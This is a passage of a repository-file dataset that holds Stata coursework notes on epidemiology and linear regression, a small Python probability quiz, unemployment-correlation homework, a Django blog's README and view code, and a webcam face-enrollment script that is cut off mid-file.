| 1035\n> Time [years] to | 42251.22 | 37324.05 | 79575.28\n> | | | \n> Incidence rate | .0162362 | .0093505 | .0130066\n\n> | Point estimate | [95% Conf. Interval] \n> --------------- | ---------------------- | --------------------------\n> Inc. rate diff. | .0068857 | .0053241 .0084473 \n> Inc. rate ratio | 1.736394 | 1.524219 1.980922 (exact)\n> Attr. frac. ex. | .4240938 | .3439265 .4951846 (exact)\n> Attr. frac. pop | .2810902 | \n> (midp) Pr(k>=686) = 0.0000 (exact)\n> (midp) 2*Pr(k>=686) = 0.0000 (exact)\n\n\n##### Q6. Calculate the 24-year Rate Ratio for developing coronary heart disease comparing underweight subjects (exposed group) to normal weight (non-exposed group), excluding subjects with prevalent CHD at the 1956 exam. #####\n\n>\t=> Rate Ratio= **0.5731434**\n\n\tgen newbmi2=.\n\treplace newbmi2=1 if bmi1<18.5 & bmi1 >0\n\treplace newbmi2=0 if bmi1>=18.5 & bmi1 <25\n\tir anychd newbmi2 timechd if (prevchd1 == 0) \n\n> newbmi1 | Exposed | Unexposed | Total\n> ---------------- | --------- | ---------- | ------------- \n> Incident Hosp MI | 6 | 349 | 355\n> Time [years] to | 1119.57 | 37324.05 | 38443.62\n> | | | \n> Incidence rate | .0053592 | .0093505 | .0092343\n\n> | Point estimate | [95% Conf. Interval] \n> --------------- | ---------------------- | ----------------------------\n> Inc. rate diff. | -.0039913 | -.0083903 .0004076 \n> Inc. rate ratio | .5731434 | .2089001 1.260145 (exact)\n> Prev. frac. ex. | .4268566 | -.2601451 .7910999 (exact)\n> Prev. frac. pop | .0124311 | \n> (midp) Pr(k<=6) = 0.0798 (exact)\n> (midp) 2*Pr(k<=6) = 0.1596 (exact)\n\n\n\n" }, { "alpha_fraction": 0.316078245639801, "alphanum_fraction": 0.4229484796524048, "avg_line_length": 47.72093200683594, "blob_id": "c320ce444c64b96bd13e44ee442054c43a7909a3", "content_id": "fd3694c42bbdc997932a3ca145653f5d0ac0108a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4192, "license_type": "no_license", "max_line_length": 105, "num_lines": 86, "path": "/PH207x/excercises/Lesson4/Measures of Association/stata-Measures_of_Association_in_Stata.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Measures of Association in Stata \n\nQ1.) Examine the association between smoking status at visit 1 (cursmoke1) and death (death)\n\n * Risk Difference\n * Risk Ratio\n * Attributable Fraction Among the Exposed\n * Attributable Fraction Among the Total Population\n * Odds Ratio\n\n=> cs death cursmoke1, or\n\n | Current smoker, exam 1 |\n | Exposed Unexposed | Total\n-----------------+------------------------+------------\n Cases | 788 762 | 1550\n Noncases | 1393 1491 | 2884\n-----------------+------------------------+------------\n Total | 2181 2253 | 4434\n Risk | .3613022 .3382157 | .3495715\n | Point estimate | [95% Conf. Interval]\n |------------------------+------------------------\n Risk difference | .0230864 | -.0049864 .0511592 \n Risk ratio | 1.06826 | .9858212 1.157592 \n Attr. frac. ex. | .0638979 | -.0143828 .1361376 \n Attr. frac. pop | .0324849 |\n Odds ratio | 1.106873 | .9783102 1.252331 (Cornfield)\n +-------------------------------------------------\n chi2(1) = 2.60 Pr>chi2 = 0.1070\n\n## Calculate the association between smoking status at visit 1 (cursmoke1) and the rate of death (death).\n=> ir death cursmoke1 timedth\n\n | Current smoker, exam 1 |\n | Exposed Unexposed | Total\n-----------------+------------------------+------------\n Death indicator | 788 762 | 1550\nTime [years] to | 44440.38 46675.2 | 91115.58\n-----------------+------------------------+------------\n Incidence rate | .0177316 .0163256 | .0170114\n | Point estimate | [95% Conf. Interval]\n |------------------------+------------------------\n Inc. rate diff. | .001406 | -.0002899 .003102 \n Inc. rate ratio | 1.086125 | .9819268 1.201432 (exact)\n Attr. frac. ex. | .0792955 | -.0184058 .1676598 (exact)\n Attr. frac. pop | .0403128 |\n +-------------------------------------------------\n (midp) Pr(k>=788) = 0.0520 (exact)\n (midp) 2*Pr(k>=788) = 0.1040 (exact)\n\n## Calculate the association between smoking status at visit 1 (cursmoke1) and the rate of CHD (anychd).\n=> ir anychd cursmoke1 timechd\n\n | Current smoker, exam 1 |\n | Exposed Unexposed | Total\n-----------------+------------------------+------------\nIncident Hosp MI | 617 623 | 1240\nTime [years] to | 39636.77 41288.39 | 80925.16\n-----------------+------------------------+------------\n | |\n Incidence rate | .0155664 .015089 | .0153228\n | |\n | Point estimate | [95% Conf. Interval]\n |------------------------+------------------------\n Inc. rate diff. | .0004774 | -.0012292 .002184 \n Inc. rate ratio | 1.031637 | .9214548 1.154975 (exact)\n Attr. frac. ex. | .0306665 | -.0852404 .1341806 (exact)\n Attr. frac. pop | .0152591 |\n +-------------------------------------------------\n (midp) Pr(k>=617) = 0.2917 (exact)\n (midp) 2*Pr(k>=617) = 0.5835 (exact)\n\n# Conclusions\n## Severak measures of disease frequency\n * risks: assume no competing risk or loss to follow-up\n * rates: person-time data accounts for dynamic population\n * odds: case-control studies\n\n## Several ways to describe association between exposure and outcome\n * difference measures\n * ratio measures\n * attributable fractions\n\n## In this study, smoking is associated with\n * a higher risk, odds and rate of death compared to non-smokers\n * a higher rate of CHD compared to non-smokers\n\n\n" }, { "alpha_fraction": 0.638624906539917, "alphanum_fraction": 0.6712105870246887, "avg_line_length": 41.3287353515625, "blob_id": "fe46d4ab0513f08405d626accb019b35c7014fbf", "content_id": "1cbf5a74539b5174b76585e273877a049b18171f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 18498, "license_type": "no_license", "max_line_length": 608, "num_lines": 435, "path": "/PH207x/excercises/Lesson10/Linear Regression.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Linear Regression #\nρ\n\n```math\n\ty= m*x + b\n```\n\n\n## Simple Linear Regression ##\n> m= slope\n\n### Correlation and slope ###\n> If X & Y are jointly normal (for each fixed X(Y) then Y(X) is normal) then\n\n```math\n\tμ_x|y= α + β*x\n```\n\n> and\n\n```math\n\tβ= ( σ_y / σ_x ) * ρ\n```\n\n> **which shows the relation between correlation and slope of regression** \n> **=> The correlation coefficient is the slope of the regression line. If we're looking at the standardized variates.**\n\n### Equivalence ###\n> So with normal data the following 3 hypotheses are equivalent:\n\n```math\n\tH_0: ρ=0 \n\t <=> \n\tH_0: β=0 \n\t <=> \n\tH_0: σ_y=σ_y|x\n```\n\n## Least Squares ##\n> Applet: http://illuminations.nctm.org/LessonDetail.aspx?id=L455 \n> Stata Command:\n\n```stata\n\tregress headcirc gestage\n```\n\n> Fitted (least squares) regression line: \n\n```math\n\theadcirc= 3.914 + 0.78*gestage + e\n```\n\n> where standard dev of e = 1.59\n\n## Transformations ##\n> Options for running the regression in such cases_\n\n1. Do a non-linear regression\n2. Transform the ys or the xs: i.e. look at y^p or x^p e.g. \n\ty^-2, y^-1,y^-0.5, ln(y), y^0.5, y, y^2 \n\tx^-2, x^-1,x^-0.5, ln(x), x^0.5, x, x^2\n\n* going up the ladder -> (going to the right)\n* goin down the ladder <- (going to the left)\n\n## More on Transformations ##\n> This applet will give you some experience with transformations and what happens to curve shapes. Remember, we are here because we know how to handle linear regression. So if we are faced with a non-linear relationship then if we can linearize it then use the tools we have for linear regression. \n> \n> As you learnt, we can transform the y variable or the x variable. You have that capability by pressing any one of the green arrow heads in the top left-hand corner of the plot below. Pushing the up arrow makes you climb the appropriate ladder on the right of the graph. Clicking the down arrow makes you go down the ladder. The dot on the ladder tells you where you are. You always start at x, y. \n> When you look at the plot you will see a series of points on the graph paper. You can generate a new set of points by clicking on either the \"ideal\" or \"realistic\" data buttons near the bottom. The latter button shows noisy data more like what you'd encounter in the real world. \n> \n> Once you have your data, the challenge is to try and choose the y or x (or both) transform to straighten out the x y relationship. Try it first with no noise and once you get the hang of it, try it with noise added. \n> \n> The green dots are the original data, the blue dots are the transformed data. The straight lines are the least squares lines through the points. \n\n> Link: https://www.edx.org/courses/HarvardX/PH207x/2012_Fall/courseware/Week_10/week10:bio10/19\n\n## Multiple Linear Regression ##\n\n```math\n\ty= α + β_1*x_1 + β_2*x_2 ... + β_q*x_q + ε\n```\n> Asume: \n\n* For fixes x_1, ..., x_q, y is **normally** distributed with mean μ_y|x_1 ...., x_q and standard deviation σ_y|x1, ...., x_q\n* μ_y|x_1, ...., x_q is linear in x_1, ...., x_q \ni.e. μ_y|x_1, ...., x_q= α + β_1*x_1 + ... + β_q*x_q\n* Homoscedasticity \ni.e. μ_y|x_1, ..., x_q is constant\n* The y's are independent\n\n> => **Minimize SUM from i=1 to n (y_i - a - b_1*x_1... -b_q*x_q)^2**\n\n```stata\n\tregress headcirc gestage weight\n```\n\n```math\n\theadcirc= 8.3 + 0.45*gestage + 0.0047*weight + e\n```\n> where standard dev of e = 1.27\n\n\n## Indicator Variables ##\n> Sometimes in the literature you'll see them called dummy variables, but why inflict that on them. \n> So for example, let's look at tomexia. \n\n* So if the mother was toxemic at delivery, then we say 1 this variable will take on the value 1. - **yes**\n* If the mother was not, then this variable will take on the value 0. **no**\n\n### Estimated regression equation ###\n\n```math\n\tŷ= 1.50 + 0.874*gestage - 1.41*tox\n```\n\n> *For toxemics:*\n```math\n\tŷ= 0.83 + 0.874*gestage\n```\n\n> *For non-toxemics:*\n```math\n\tŷ= 1.50 + 0.874*gestage\n```\n\n```stata\n\tregression headcirc gestage tox\n```\n\n#### Test with T-Test #####\n> And so here's the t-test for head circumference by toxemia. And we see that we have 79 observations who are non toxemic and 21 who are toxemic. And we see that the t-test is not significant.\n\n```stata\n\tttest headcirc, by(tox) unequal\n```\n\n> So all of this is very complex. How do all of these things work together? So what we can do is we can generate a variable called gestational age times toxemia.\n\n```stata\n\tgen gestox = gestage*tox\n\tregression headcirc gestage tox gestox\n```\n\n## Subset Regression ##\n> So what you're doing when you're investigating is making sure that you're measuring everything, but then, you know that all these things, everything under the sun is interrelated with each other. And so that's not what you're looking for, you're looking to see is there a parsimonious way of explaining what's going on in terms of the more important, most important variables, and this we can generically label or umbrella, if you will, as the subset regression problem. \n> \n> So you've got outcome variable here, in this case, head circumference, and then you've got a whole bunch of variables that you can use to explain this. Which ones do you use in what combinations, et cetera, that's called the subset regression problem.\n\n* **All possible models** \nIf q sizeable, 2^q huge\n\n* **Forward Selection** \n(i)Choose one Variable, (ii) push this into the model and then (iii) look at the other variables\n\n* **Backward Selection** \n(i) Fit \"all\", (ii) Drop least signicant and then (iii) go back to (i)\n\n> So there are **q** variables, then we can do all two to the q. Turns out it's two to the q model fits. Now, apart from the fact that if you've got thousands of observations and q is sizable, it's going to take you the rest of your life to do all \n\n### Collinear Problem - Multi-Collinearity ###\n> So if you have a high correlation, you might run into interpretation problems and fitting problems. That's the collinear problem. \n> **collinear= Variables are perfectly correlated with each other.** \n\n> Results:\n\n | No interaction term | Interaction term \n---------- | ------------------- | ------------------ \nCoeff | -1.412 | -2.815 \nStd. Err. | 0.406 | 4.985 \nT-Stat | -3.477 | -0.565 \nP-Value | 0.001 | 0.574 \nR² | 0.653 | 0.653 \nAdj. R² | 0.646 | 0.642 \n\n> **Hint:** Look at the Standard Error, T-Statistics and R-Squares. \n* Look at the standard error, there's a tenfold increase in the standard error, and that's usually a tip-off that you've got some **multi-collinearity** possibly. \n* The T statistic went from a significant to quite insignificant. By adding one term you shouldn't be seeing this big a difference, unless it's very highly related to before. \n* And look at the P value went from 0.001 to 0.574, and the R-squared didn't change. \n* The R-squares didn't change at all. They're basically the same thing. Tip-off that you've got **multi-collinearity**.\n\n## Example: Hospital Ratings ##\n> In the tutorial sequence this week, we examine predictors of hospital ratings using publicly available hospital-level survey information from https://data.medicare.gov . The dataset contains \"a list of hospital ratings for the Hospital Consumer Assessment of Healthcare Providers and Systems (HCAHPS). HCAHPS (http://www.hcahpsonline.org/home.aspx) is a national, standardized survey of hospital patients about their experiences during a recent inpatient hospital stay.\" To access this dataset online, go here (https://data.medicare.gov/dataset/Survey-of-Patients-Hospital-Experiences-HCAHPS-/rj76-22dk). \n> \n> We excluded any hospitals with missing data (complete case analysis). We aim to examine trends in hospitals, and assume that this sample is representative of hospitals in the United States. Each line in this dataset represents one hospital. The variables are continuous, representing percentages from patient respondents. \n> \n> Hospitals aiming to improve their ratings could use this database to find the areas that are influential for patient ratings. They could examine synergies between variables to pinpoint exactly where they should invest their improvements to provide the best patient experience. Linear regression is a tool that facilitates such analyses. \n> \n> On the boards below, discuss any advantages to using linear regression, rather than simple calculating correlations, in this application. \n> \n> (The dataset is included below, if you would like to further familiarize yourself with the data before beginning the tutorial sequence.)\n\n```stata\n\tuse \"hospitaldata.dta\"\n```\n\n## Tutorial: Simple Linear Regression ##\n> We examine predictors of hospital ratings using publicly available *hospital-level* survey information from https://data.medicare.gov .\n\n* **nursealways** - percent of patients in a hospital who said their nurse always communicated well (*explanatory*)\n* **recommendyes** - percent of patients who would always recommend the hospital (*outcome*)\n\n```stata\n\tuse \"hospitaldata.dta\"\n\ttwoway (scatter recommendyes nursealways)\n\tpwcorr recommendyes nursealways\n```\n\n | recommendyes | nursealways\n------------ | ------------- | ------------\nrecommendyes | 1.0000 | \n nursealways | 0.6580 | 1.0000 \n\n> I find that the correlation between these two variables is **p=0.66**. So it does appear that they are positively correlated.\n\n### State your model ###\n> Y_i= % patients in hospital i who would always recommend this hospital. | i=1,2,...,n \n> X_i= % patients in hospital i who say that their nurse always communicated well. \n> ε_i= residual error -> ε_i ~ N(0, T²) \n> y_i= α + β_1*x_i + ε_i\n> μ_y_i|x_i= E(y_i|x_i)= α + β*x | Y_i ~ N(μ_y_i|x_i, σ²)\n\n### Assumptions ###\n\n* We can assume that the **hospitals are independent** of each other, and so it seems reasonable to say that we have independent observations, or independent hospitals.\n* We need to assume that there's a **linear relationship between the outcome in covariate**. And we looked at the scatter plot and this looked pretty reasonable.\n* The next two assumptions are the ones that are a little bit hairier to try to interpret in practice:\n\t+ The first is that **Y_i|X_i ~ N** - So the outcome given the covariate is **normally distributed**.\n\t+ The next assumption we need to make is **homoskedasticity**, and this is just a very long word that means constant variance.\n\n```stata\n\tregress recommendyes nursealways\n```\n\n```\n Source | SS df MS Number of obs = 3570\n-------------+------------------------------ F( 1, 3568) = 2723.72\n Model | 144368.851 1 144368.851 Prob > F = 0.0000\n Residual | 189118.972 3568 53.0041962 R-squared = 0.4329\n-------------+------------------------------ Adj R-squared = 0.4327\n Total | 333487.823 3569 93.4401297 Root MSE = 7.2804\n\n------------------------------------------------------------------------------\nrecommendyes | Coef. Std. Err. t P>|t| [95% Conf. Interval]\n-------------+----------------------------------------------------------------\n nursealways | 1.159487 .0222169 52.19 0.000 1.115928 1.203046\n _cons | -19.21559 1.712829 -11.22 0.000 -22.57381 -15.85737\n------------------------------------------------------------------------------\n```\n\n```stata\n\tsum nursealways\n```\n\n Variable | Obs | Mean | Std. Dev. | Min | Max\n------------ | ----------- | ----------- | ------------- | ------ | ------\n nursealways | 3570 | 76.90028 | 5.485264 | 48 | 98\n\n\n```math\n\ty_i= -19.21559 + 1.159487*x_i + ε_i\n\tε_i ~ N(0, 7.2804²)\n```\n\n> **Important:** It is a very important aspect of linear regression that you always need to keep in mind that we can't extrapolate beyond the minimum value (here: 48).\n\n### Test that hypothesis β= 0 vs β !=0 ###\n> The next thing I want to do is I want to test the hypothesis that beta is equal to 0 versus the alternative the beta is not equal to 0. \n> H_0: β= 0 \n> H_A: β != 0 \n> \n> ^β=1.16 \n> ^σ(β)=Std. Err.= 0.02 \n> t=t-test=52.19\n\n\n> Now I know that under my null hypothesis that my t statistic follows a t distribution with **Z=n-2** degrees of freedom. And I see up here that my number of observations is **n=3,570**, so it would be **3,568 degrees** of freedom. \n> Z ~H_o t_3568 => p-value < 0.001\n\n> **Conclusion:** I would reject my null hypothesis and conclude that the percent of patients who say that a nurse always communicates well is positively correlated with a percent of patients who would always recommend\na hospital.\n\n### Amount of variability explained by my covariate ###\n> I can look at the **r²**. For this model my **r²=0.4329**. \n> r² is known as the coefficient of determination, and in this example it tells us:\n> * that 43% of the variability among the observed values of *recommendyes*, \n> * the outcome, 40% of that variability is explained by the linear relationship with *nursealways*.\n> * the remaining 57% of the variability is unexplained, implying that there are other factors that contribute to whether the percent of patients\n> * the remaining 57% of the variability is unexplained, implying that there are other factors that contribute to the variability in this *recommendyes* outcome.\n\n### Analyze by plot ###\n\n#### Residual versus fitted plot ####\n```stata\n\trvfplot\n```\n\n> What I'm looking for here is I don't want to see any trends in these residuals.\n> * I see that they're about means 0.\n> * I don't see any weird trends going on.\n> * If I saw any U shapes or the residuals getting larger over time, these would be problems.\n> \n> So as long as you don't see any patterns in that residual plot, that **means your model's probably doing OK**.\n\n#### Residual versus predictor plot ####\n```stata\n\trvpplot nursealways\n```\n\n> So I can look at the residuals now as a function of the covariate in the model. \n> And again, I don't see any major trends in this residual plot. Things look OK, so I can assume that the fit of my model looks OK. \n> * I don't see any major outliers.\n> * I don't see anywhere trends in my residuals.\n> \n> However, there's really typically never a definitive answer to whether your **model fit is good**.\n\n#### Predict the expected percent of patients ####\n> The next thing I want to do is I want to predict the expected percent of patients who will always recommend the hospital when the percent of nurses who always communicate well is 80%\n\n> ⁻y_i|x_i=80 \n\n> So what I want to do is I want to look at the average value of Yi when Xi is equal to 80. And the way that I can estimate that guy is I can say this is equal to alpha hat plus beta hat times, and I just plug in 80 for Xi.\n\n> y_i= ^α + ^β*80=73.54339\n\n```stata\n\tlincom _cons + nursealways*80\n```\n\n recommendyes | Coef. | Std. Err. | t | P>|t| | [95% Conf. | Interval]\n------------- | ---------- | ----------- | ------- | ------- | ------------ | -----------\n 1 | 73.54339 | 0.1399631 | 525.45 | 0.000 | 73.26897 | 73.8178\n\n\n## Simple Linear Regression ##\nConsider the following linear regression model. We have a continuous outcome and a continuous explanatory covariate for *n* different independent observations. Notation:\n* Y_i = outcome for i = 1,...,n\n* X_i = covariate for i = 1,...,n\n\nWe fit the linear regression model: \n```math\n\tY_i = α + β*X_i + ε_i\n```\nwhere ε_i ~ N(0,σ²). \n \nAsume the assumptions for simple linear regression are met.\n\nTrue or false:\n\n#### 1. If β is positive, the Pearson correlation will always be positive. ####\n* **=> True**\n* False\n\n#### 2. If β is positive, the Spearman correlation will always be positive. ####\n* True\n* **=> False**\n\n#### 3. α is defined as the value of Y_i when X_i=0. ####\n* True\n* **=> False**\n\n#### 4. We can predict the expected value of Y_i given X_i. ####\n* **=> True**\n* False\n\n#### 5. The variance of Y_i is σ². ####\n* True\n* **=> False**\n\n## Tutorial: Indicator Variables and Regression ##\nVideo: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-T10-21_100.mp4 \n\n### State your model ###\nY_i = % patients in hospital who always recommend the hospital (i=1,...,3570) \nD_i = 1 - Means that at least 75% of the patients in that hospital said that the nurse always communicates well \nD_i = 0 - Means less then 75% communicate well \n\n```math\n\tY_i = α + β*D_i + ε_i\n```\nwhere ε_i ~ N(0,σ²). \n \n\n```stata\n\tgen highnurse = .\n\treplace highnurse = 1 if nursealways >= 75 & nursealways < .\n\treplace highnurse = 0 if nursealways < 75\n\tregress recommendyes highnurse\n\txi: regress recommendyes i.highnurse\n\tttest recommendyes, by(highnurse)\n```\n\nFormular which we get out:\n```math\n\tY_i = 62.86 + 9.98*D_i + ε_i\n```\nwhere ε_i ~ N(0,8.5402²). \n \n^E(Y_i|D_i=1) = α + β*(1) \n^E(Y_i|D_i=0) = α + β*(0) \n \nH_0: β=0 \nH_A: β!=0 \n\n## Indicator Variables and Regression ##\nConstruct a categorical covariate for quietalways, defined by dividing quietalways into four quartiles. \n\n```stata\n\txtile quietcat = quietalways, nquan(4)\n```\n\nFit three different regression models with recommendyes as your outcome and using the following explanatory covariates:\n* quietalways \n```stata\n\tregress recommendyes quietalways\n```\n* quietcat (treat this as a continuous covariate) \n```stata\n\tregress recommendyes quietcat\n```\n* quietcat (treat this as a categorical covariate) \n```stata\n\txi: regress recommendyes i.quietcat\n```\n\n#### 1. Think about the assumptions of linear regression. Suppose you tested whether all of the regression coefficients in model three, except for the intercept, are equal to zero. Would you expect this test to produce similar results as a one-way ANOVA model? ####\n* Yes\n* No \n\n#### 2. Compare the t-statistics between model 1 and model 2. Examine the scatter plot of recommendyes versus quietalways. Do these two pieces of evidence suggest that, when you categorize and the relationship between two variables is truly linear, you lose power. #### \n* Yes\n* No \n\n\nConsider models 1-3. On the discussion boards below, compare the three models and discuss the tradeoffs of categorizing versus leaving variables as continuous. For instance, what if the relationship between the outcome and covariate was non-linear (e.g. quadratic/U-shaped)?\n" }, { "alpha_fraction": 0.7055555582046509, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 29, "blob_id": "45a16e61796825d6dcbd295f466f22d81dbdd905", "content_id": "b76db1b9507d39f40cfb5516e8fc30feb6a90202", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 360, "license_type": "no_license", "max_line_length": 106, "num_lines": 12, "path": "/CS373/Unit-1/unit-1_4.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Uniform-Probability-Quiz \n# Robot Localization\n\n# We have 5 different cells where each cell has the same probability that the robot might be in that cell.\n# So probabilities add up to 1\n# Quiz from x1 to x5\n# -> What is the probability of any of those x's?\nimport decimal\n\nn = decimal.Decimal(5)\np_xi = 1/n\nprint \"-> The probability of any x's is %f\" % p_xi\n" }, { "alpha_fraction": 0.6844106316566467, "alphanum_fraction": 0.7129277586936951, "avg_line_length": 33.40187072753906, "blob_id": "4daeaf3eca98c8907102ae5272926ba2bf8aa003", "content_id": "6021ed3193af701a0738808a69e44aeabef4a349", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3684, "license_type": "no_license", "max_line_length": 267, "num_lines": 107, "path": "/PH207x/homework/nine/Trends in Unemployment.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Trends in Unemployment ##\n> We again use publicly available data from the World Bank’s website to examine national trends in unemployment percentages (percent unemployed in total labor force) in four countries: the United States, Great Britain, Japan, and Canada. \n> \nIn this question, we examine unemployment trends over time using a correlation analysis, focusing primarily on the United States and Japan. \n> \n> Use the dataset UnemploymentbyCountry.dta to answer the following questions. \n\n```stata\n\tuse \"UnemploymentbyCountry.dta\"\n```\n\n### Consider the following questions: ###\n\n#### 1. Calculate the Pearson and Spearman correlations between total unemployment and year for the United States and for Japan. ####\n\n##### United States: ######\n* Pearson: **-0.3415**\n* Spearman: **-0.4517**\n\n```stata\n\tpwcorr unemployedtotal year if country == \"United States\", sig\n```\n\n```stata\n\tspearman unemployedtotal year if country == \"United States\"\n```\n\n##### Japan: ######\n* Pearson: **0.8437**\n* Spearman: **0.8162**\n\n```stata\n\tpwcorr unemployedtotal year if country == \"Japan\", sig\n```\n\n```stata\n\tspearman unemployedtotal year if country == \"Japan\"\n```\n\n#### 2. Exclude all years after 2007 (recall that the financial collapse occurred in late 2008). Recalculate the correlations in question 1. (Hint: use an \"if\" command to restrict to certain years in Stata.) ####\n\n##### United States: ######\n* Pearson: **-0.7557**\n* Spearman: **-0.7733**\n\n```stata\n\tpwcorr unemployedtotal year if country == \"United States\" & year < 2008, sig\n```\n\n```stata\n\tspearman unemployedtotal year if country == \"United States\" & year < 2008\n```\n\n##### Japan: ######\n* Pearson: **0.8276**\n* Spearman: **0.7998**\n\n```stata\n\tpwcorr unemployedtotal year if country == \"Japan\" & year < 2008, sig\n```\n\n```stata\n\tspearman unemployedtotal year if country == \"Japan\" & year < 2008\n```\n\n\n#### 3. Construct a scatter plot with year on the x-axis and with both unemployment in the United States and unemployment in Japan on the y-axis. ####\n> **Hint1:** try plotting different symbols for the United States and Japan by creating two different plots within the Twoway graphs window; restrict to a specific country by using an \"if\" statement within each plot window).\n\n##### Which pattern best describes the trend in unemployment in the United States between 1980 and 2010? ##### \n* linear \n* quadratic \n* => **cyclic**\n* gradual non-linear increase \n\n```stata\n\ttwoway (connected unemployedtotal year if country==\"United States\") if year > 1979 & year < 2011\n```\n\n##### Which pattern best describes the trend in unemployment in the Japan between 1980 and 2010? #####\n* linear \n* quadratic \n* cyclic\n* **gradual non-linear increase** \n\n```stata\n\ttwoway (connected unemployedtotal year if country==\"Japan\") if year > 1979 & year < 2011\n```\n\n\n#### 4. True or False: correlation analyses have the potential to mask important non-linear trends in data. ####\n> **Hint1:** Can correlation analysis hide non-linear relationships.\n* => **True**\n* False\n\n\nAre there not other methods to analyze non linear relationship like spearman and rank test? \n\nSpearman and rank are used for not normal distributed data. In Q4 we are interested about \"non-linear trends\". And this is a big difference.\n\n#### 5. Restricting to the United States, construct a scatterplot with year on the x-axis and with total unemployment; unemployment among women; and unemployment among men on the y-axis. Do there appear to be sex-specific differences in the unemployment trends? #### \n* True\n* **False**\n\n```stata\n\ttwoway (scatter unemployedf year if country==\"United States\", sort) (scatter unemployedm year if country==\"United States\", sort)\n```\n\n" } ]
70
AbelSu131/mysite
https://github.com/AbelSu131/mysite
cf026dca30ad38ee93d2cde86310fda6ae39ab3d
fb2369a5dd96c96a425f3d8a2b83c7cacf13cc73
56c08b82e9acce35471a8d0b1b15e11864f514a0
refs/heads/master
2021-01-13T00:43:03.417544
2015-11-15T13:54:40
2015-11-15T13:54:40
46,219,327
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6849315166473389, "alphanum_fraction": 0.7191780805587769, "avg_line_length": 23.33333396911621, "blob_id": "18ff001fb4797293653751d7203a610a74c73106", "content_id": "9a3e0d0f6327371ecf1d3d404ef310c19d1af59a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 148, "license_type": "no_license", "max_line_length": 70, "num_lines": 6, "path": "/README.md", "repo_name": "AbelSu131/mysite", "src_encoding": "UTF-8", "text": "###mysite\n\n####This is my first Django Project\n\n####Effect as shown below:\n![image](https://github.com/AbelSu131/mysite/blob/master/django01.JPG)\n" }, { "alpha_fraction": 0.6618556976318359, "alphanum_fraction": 0.6639175415039062, "avg_line_length": 33.71428680419922, "blob_id": "3350116492726cc44c5c9e162ccac548b27be920", "content_id": "45b240d5bfc1abb5564daab159cb126bb1100db2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 591, "license_type": "no_license", "max_line_length": 68, "num_lines": 14, "path": "/mysite/blog/views.py", "repo_name": "AbelSu131/mysite", "src_encoding": "UTF-8", "text": "# coding=utf-8\nfrom django.shortcuts import render\nfrom blog.models import BlogsPost\nfrom django.shortcuts import render_to_response\n\n# Create your views here.\ndef index(request):\n # 获取数据库里面所拥有的BlogPost对象\n blog_list = BlogsPost.objects.all()\n hello = '欢迎来到我的博客'\n #render_to_response()返回一个页面(index.html)\n # 顺带把数据库中查询出来的所有博客内容(blog_list)也一并返回。\n return render_to_response('index.html', {'blog_list': blog_list,\n 'hi': hello })" } ]
2
SHANK885/realtime_face_recognition
https://github.com/SHANK885/realtime_face_recognition
325864fad6ce8f6f2601e730c9dfa24c27364f3a
4cb3555e58990a4b853dc21af01b13d06e899c2c
fd5b8455296a5791780589967ccf3b76c7f34a07
refs/heads/master
2020-09-24T19:45:10.871615
2019-12-07T16:38:37
2019-12-07T16:38:37
225,828,637
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5104241371154785, "alphanum_fraction": 0.5238437652587891, "avg_line_length": 31.6015625, "blob_id": "93cafa1dd34a6c9d415429cd7ab56e99db949112", "content_id": "a6ebaccebea89efda1938922681343ba7c4135a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4173, "license_type": "permissive", "max_line_length": 78, "num_lines": 128, "path": "/enroll_face.py", "repo_name": "SHANK885/realtime_face_recognition", "src_encoding": "UTF-8", "text": "from keras import backend as K\nfrom fr_utils import *\nfrom inception_blocks_v2 import *\nfrom triplet_loss import triplet_loss\nimport numpy as np\nimport json\nimport cv2\nimport sys\nimport os\nimport argparse\nK.set_image_data_format('channels_first')\n\ndef main(args):\n image_path = \"./database/images/\"\n embedding_path = \"./database/embeddings/embeddings.json\"\n face_detector_path = \"./classifiers/haarcascade_frontalface_default.xml\"\n\n image_path = os.path.join(image_path, args.name + \".png\")\n\n video_capture = cv2.VideoCapture(0)\n face_detector = cv2.CascadeClassifier(face_detector_path)\n\n print(\"*********Initializing Face Enrollment*************\\n\")\n\n\n while True:\n while True:\n if video_capture.isOpened():\n ret, frame = video_capture.read()\n\n raw_frame = frame.copy()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_detector.detectMultiScale(gray,\n scaleFactor=1.5,\n minNeighbors=5,\n minSize=(30, 30))\n print(\"length of faces: \", len(faces))\n print(\"faces:\\n\", faces)\n if len(faces) == 0:\n continue\n else:\n areas = [w*h for x, y, w, h in faces]\n i_biggest = np.argmax(areas)\n bb = faces[i_biggest]\n\n cv2.rectangle(frame,\n (bb[0], bb[1]),\n (bb[0]+bb[2], bb[1]+bb[3]),\n (0, 255, 0),\n 2)\n\n cropped = raw_frame[bb[1]:bb[1]+bb[3], bb[0]:bb[0]+bb[2]]\n image = cv2.resize(cropped,\n (96, 96),\n interpolation=cv2.INTER_LINEAR)\n\n cv2.imshow(\"Video\", frame)\n if cv2.waitKey(1) & 0xFF == ord('s'):\n print(\"Face Captured for: {}\".format(args.name))\n break\n\n print(\"Press 'C' to confirm this image\")\n print(\"Press 'R' to retake the picture\")\n\n response = input(\"\\nEnter Your Response: \")\n\n if response == \"C\" or response == \"c\":\n print(\"\\nImage finalized\\n\")\n video_capture.release()\n cv2.destroyAllWindows()\n break\n if response == \"R\" or response == \"r\":\n cv2.destroyAllWindows()\n continue\n\n if os.path.exists(image_path):\n print(\"Member with name: {} already 